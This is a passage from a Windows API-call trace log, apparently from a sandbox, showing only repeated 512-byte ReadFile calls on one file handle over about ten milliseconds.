lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.017] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.018] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.019] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.020] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.021] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.022] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.023] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.024] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.025] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.026] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, 